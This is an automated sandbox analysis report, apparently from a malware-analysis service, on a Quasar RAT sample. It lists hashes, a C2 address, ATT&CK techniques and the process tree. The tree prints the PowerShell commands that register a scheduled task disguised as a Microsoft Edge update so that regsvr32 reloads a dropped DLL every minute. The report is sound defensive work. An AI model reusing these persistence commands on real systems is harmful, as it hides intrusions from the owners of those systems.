quasar | c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49

Analysis

max time kernel
142s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-02-2025 07:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe
Size

3.2MB
MD5

a2f9781e42a8da5eb3cbe8a4dba009e6
SHA1

61baaae3da49b0985fa32e6ef9c6ca7a422e0eb4
SHA256

c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49
SHA512

fc5b0416333ba59d7af489255f258db879bf1b7639000a54ff233b100cb50ff57f0026512d58fb540d87cdac0a398c1b796ef4156cd8293e4a1978b2f4c0aa15
SSDEEP

98304:1OXPiu6YrHfZ1diRq+/gr56mQr+dFiJzqGT4q:Qiu6MfZ1dt+AVq6mei4q

Score

10^/10

quasar svchost32 discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

svchost32

185.147.124.146:4782

Mutex

70595b2f-92ed-4cab-b358-5e9c155366b4

Attributes

encryption_key
B207941BD17A6DAD99D4F816F934730315BCD00D
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/1328-83-0x000000001BD50000-0x000000001C074000-memory.dmp	family_quasar

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp

Executes dropped EXE 2 IoCs

pid	Process
3056	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp
2948	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp

Loads dropped DLL 8 IoCs

pid	Process
3056	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp
3056	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp
2948	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp
2948	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp
3684	regsvr32.exe
1328	regsvr32.exe
4624	regsvr32.EXE
2680	regsvr32.EXE

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to execute payload.

execution

PowerShell

T1059.001

pid	Process
2988	powershell.exe
216	powershell.exe
3388	powershell.exe
3244	powershell.exe
3388	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
2948	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp
2948	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp
1328	regsvr32.exe
1328	regsvr32.exe
216	powershell.exe
216	powershell.exe
3388	powershell.exe
3388	powershell.exe
1328	regsvr32.exe
1328	regsvr32.exe
4624	regsvr32.EXE
4624	regsvr32.EXE
3244	powershell.exe
3244	powershell.exe
4624	regsvr32.EXE
4624	regsvr32.EXE
2680	regsvr32.EXE
2680	regsvr32.EXE
2988	powershell.exe
2988	powershell.exe
2680	regsvr32.EXE
2680	regsvr32.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	216	powershell.exe
Token: SeIncreaseQuotaPrivilege	216	powershell.exe
Token: SeSecurityPrivilege	216	powershell.exe
Token: SeTakeOwnershipPrivilege	216	powershell.exe
Token: SeLoadDriverPrivilege	216	powershell.exe
Token: SeSystemProfilePrivilege	216	powershell.exe
Token: SeSystemtimePrivilege	216	powershell.exe
Token: SeProfSingleProcessPrivilege	216	powershell.exe
Token: SeIncBasePriorityPrivilege	216	powershell.exe
Token: SeCreatePagefilePrivilege	216	powershell.exe
Token: SeBackupPrivilege	216	powershell.exe
Token: SeRestorePrivilege	216	powershell.exe
Token: SeShutdownPrivilege	216	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeSystemEnvironmentPrivilege	216	powershell.exe
Token: SeRemoteShutdownPrivilege	216	powershell.exe
Token: SeUndockPrivilege	216	powershell.exe
Token: SeManageVolumePrivilege	216	powershell.exe
Token: 33	216	powershell.exe
Token: 34	216	powershell.exe
Token: 35	216	powershell.exe
Token: 36	216	powershell.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeIncreaseQuotaPrivilege	3388	powershell.exe
Token: SeSecurityPrivilege	3388	powershell.exe
Token: SeTakeOwnershipPrivilege	3388	powershell.exe
Token: SeLoadDriverPrivilege	3388	powershell.exe
Token: SeSystemProfilePrivilege	3388	powershell.exe
Token: SeSystemtimePrivilege	3388	powershell.exe
Token: SeProfSingleProcessPrivilege	3388	powershell.exe
Token: SeIncBasePriorityPrivilege	3388	powershell.exe
Token: SeCreatePagefilePrivilege	3388	powershell.exe
Token: SeBackupPrivilege	3388	powershell.exe
Token: SeRestorePrivilege	3388	powershell.exe
Token: SeShutdownPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeSystemEnvironmentPrivilege	3388	powershell.exe
Token: SeRemoteShutdownPrivilege	3388	powershell.exe
Token: SeUndockPrivilege	3388	powershell.exe
Token: SeManageVolumePrivilege	3388	powershell.exe
Token: 33	3388	powershell.exe
Token: 34	3388	powershell.exe
Token: 35	3388	powershell.exe
Token: 36	3388	powershell.exe
Token: SeIncreaseQuotaPrivilege	3388	powershell.exe
Token: SeSecurityPrivilege	3388	powershell.exe
Token: SeTakeOwnershipPrivilege	3388	powershell.exe
Token: SeLoadDriverPrivilege	3388	powershell.exe
Token: SeSystemProfilePrivilege	3388	powershell.exe
Token: SeSystemtimePrivilege	3388	powershell.exe
Token: SeProfSingleProcessPrivilege	3388	powershell.exe
Token: SeIncBasePriorityPrivilege	3388	powershell.exe
Token: SeCreatePagefilePrivilege	3388	powershell.exe
Token: SeBackupPrivilege	3388	powershell.exe
Token: SeRestorePrivilege	3388	powershell.exe
Token: SeShutdownPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeSystemEnvironmentPrivilege	3388	powershell.exe
Token: SeRemoteShutdownPrivilege	3388	powershell.exe
Token: SeUndockPrivilege	3388	powershell.exe
Token: SeManageVolumePrivilege	3388	powershell.exe
Token: 33	3388	powershell.exe
Token: 34	3388	powershell.exe
Token: 35	3388	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2948	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1328	regsvr32.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 3056	2780	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe	84
PID 2780 wrote to memory of 3056	2780	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe	84
PID 2780 wrote to memory of 3056	2780	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe	84
PID 3056 wrote to memory of 3024	3056	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp	85
PID 3056 wrote to memory of 3024	3056	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp	85
PID 3056 wrote to memory of 3024	3056	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp	85
PID 3024 wrote to memory of 2948	3024	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe	86
PID 3024 wrote to memory of 2948	3024	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe	86
PID 3024 wrote to memory of 2948	3024	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe	86
PID 2948 wrote to memory of 3684	2948	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp	87
PID 2948 wrote to memory of 3684	2948	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp	87
PID 2948 wrote to memory of 3684	2948	c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp	87
PID 3684 wrote to memory of 1328	3684	regsvr32.exe	88
PID 3684 wrote to memory of 1328	3684	regsvr32.exe	88
PID 1328 wrote to memory of 216	1328	regsvr32.exe	89
PID 1328 wrote to memory of 216	1328	regsvr32.exe	89
PID 1328 wrote to memory of 3388	1328	regsvr32.exe	92
PID 1328 wrote to memory of 3388	1328	regsvr32.exe	92
PID 4624 wrote to memory of 3244	4624	regsvr32.EXE	103
PID 4624 wrote to memory of 3244	4624	regsvr32.EXE	103
PID 2680 wrote to memory of 2988	2680	regsvr32.EXE	106
PID 2680 wrote to memory of 2988	2680	regsvr32.EXE	106

C:\Users\Admin\AppData\Local\Temp\c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe
"C:\Users\Admin\AppData\Local\Temp\c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Users\Admin\AppData\Local\Temp\is-J81TC.tmp\c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-J81TC.tmp\c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp" /SL5="$C01DA,2956477,245248,C:\Users\Admin\AppData\Local\Temp\c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3056
- - C:\Users\Admin\AppData\Local\Temp\c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe
    "C:\Users\Admin\AppData\Local\Temp\c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe" /VERYSILENT
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Users\Admin\AppData\Local\Temp\is-Q17L5.tmp\c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-Q17L5.tmp\c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp" /SL5="$701C2,2956477,245248,C:\Users\Admin\AppData\Local\Temp\c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2948
    - - C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\d3d9_4.drv"
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3684
      - C:\Windows\system32\regsvr32.exe
        
        /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\d3d9_4.drv"
        6⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\Admin\AppData\Roaming\d3d9_4.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{F54400AD-C0D7-44CD-84E5-B490DD373E47}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3388

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\Admin\AppData\Roaming\d3d9_4.drv
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3244

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\Admin\AppData\Roaming\d3d9_4.drv
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cc6cfea44f94d487d302fe97587a055e

SHA1
557162e994c02df41a16f0aec6ae9b6dab3ac9eb

SHA256
7569944335801a4a9ad619291599faab03d1f1e6915042b32c7c80aa49803fe3

SHA512
9a19216612bd0724d7f7d346966699766ac09e2480239d8af2036f6239c248c9df4b45d8b57c64e4016d1eb8b9e20fe0f45fb09cad37a96668db5ddefbf58ee6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ca0218dc9bb7a6c57f1146cb00a682ad

SHA1
734607b8f61c7bcf2a7b1b11b2ebc18cbb2bdbac

SHA256
cba7dd41f32c56e99a28e51fff55943c1b1fd3d52310bf3af4c7d65fc335d7f5

SHA512
a50dc75d81f5ce246eed3e4303ac935988c37abac3b9f6bf1eedc2faeedb297178542fd2cc07082482d153ff535995fd71377d73d7502c80fb7418a61ecc32bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c8c29f1f588816cb69fcebf642891720

SHA1
968d91f771b5e235c91952025509479c4456b44e

SHA256
2e1d2b0a86abe46d40843dbc522f6c9891671b21c1ac61e21d32f7245a93eb8b

SHA512
6b19696757654762ec551388c04142d4404892314c3e8a811b3260834dd6110b57be9aa4a0497ff579a4936c91cbdfbf7a938f676ee24e7476ecdd1b668cac3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pr0kudrq.lgx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-7HQ1T.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-J81TC.tmp\c6d8cde7cd9d0731356ae426c5b6d3d7a8ab05143fa78d257af9b9d037be7b49.tmp

Filesize
1.2MB

MD5
70fcedd0d46d1c97af8e3eb4868c5bf1

SHA1
42ae1e3080be4720fc1bb97ef63d59f2f26e1558

SHA256
fcae74ccb09740303d86a88dd07db209721458e8eb48697f1c7d666a67dd5a07

SHA512
2cc42882fbdcd3d8bc4c3caa2116b76bd65fccff35e6058cfe67a80a307251b77bcbf17ddbd51e9d566f6810ac95ea33848da2a733cab6135d399dfaaf0c1020

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-UO99C.tmp\_isetup\_isdecmp.dll

Filesize
13KB

MD5
a813d18268affd4763dde940246dc7e5

SHA1
c7366e1fd925c17cc6068001bd38eaef5b42852f

SHA256
e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64

SHA512
b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

Download Submit
C:\Users\Admin\AppData\Roaming\d3d9_4.drv

Filesize
4.2MB

MD5
707e9a2445ea22ce1bfafbad0583c1d4

SHA1
73918fb8eb7b21c2d6bb27f9ce48c23c92bef006

SHA256
3455e2e96cd0a23323da81a2bcf9566200de523f1d1d85efe27f55ed2add9e8b

SHA512
77485310a94451eb2246caf0cb03743facde00a7531eaea32725782f39b5b84739b71f203668b96f3e9e5ebee088fc0283406e9129ed27694cf9b8e67bbbbe66

Download Submit
memory/216-57-0x000001D1729C0000-0x000001D1729E2000-memory.dmp

Filesize
136KB

Download
memory/1328-85-0x000000001CDB0000-0x000000001CE62000-memory.dmp

Filesize
712KB

Download
memory/1328-84-0x000000001BCE0000-0x000000001BD30000-memory.dmp

Filesize
320KB

Download
memory/1328-83-0x000000001BD50000-0x000000001C074000-memory.dmp

Filesize
3.1MB

Download
memory/1328-86-0x00007FFBC4E20000-0x00007FFBC526C000-memory.dmp

Filesize
4.3MB

Download
memory/2680-123-0x00007FFBC4E20000-0x00007FFBC526C000-memory.dmp

Filesize
4.3MB

Download
memory/2780-27-0x0000000000400000-0x0000000000446000-memory.dmp

Filesize
280KB

Download
memory/2780-2-0x0000000000401000-0x0000000000417000-memory.dmp

Filesize
88KB

Download
memory/2780-0-0x0000000000400000-0x0000000000446000-memory.dmp

Filesize
280KB

Download
memory/2948-51-0x0000000000400000-0x0000000000541000-memory.dmp

Filesize
1.3MB

Download
memory/2948-34-0x0000000000400000-0x0000000000541000-memory.dmp

Filesize
1.3MB

Download
memory/3024-23-0x0000000000400000-0x0000000000446000-memory.dmp

Filesize
280KB

Download
memory/3024-53-0x0000000000400000-0x0000000000446000-memory.dmp

Filesize
280KB

Download
memory/3024-21-0x0000000000400000-0x0000000000446000-memory.dmp

Filesize
280KB

Download
memory/3056-25-0x0000000000400000-0x0000000000541000-memory.dmp

Filesize
1.3MB

Download
memory/3056-7-0x0000000000400000-0x0000000000541000-memory.dmp

Filesize
1.3MB

Download
memory/4624-104-0x00007FFBC4E20000-0x00007FFBC526C000-memory.dmp

Filesize
4.3MB

Download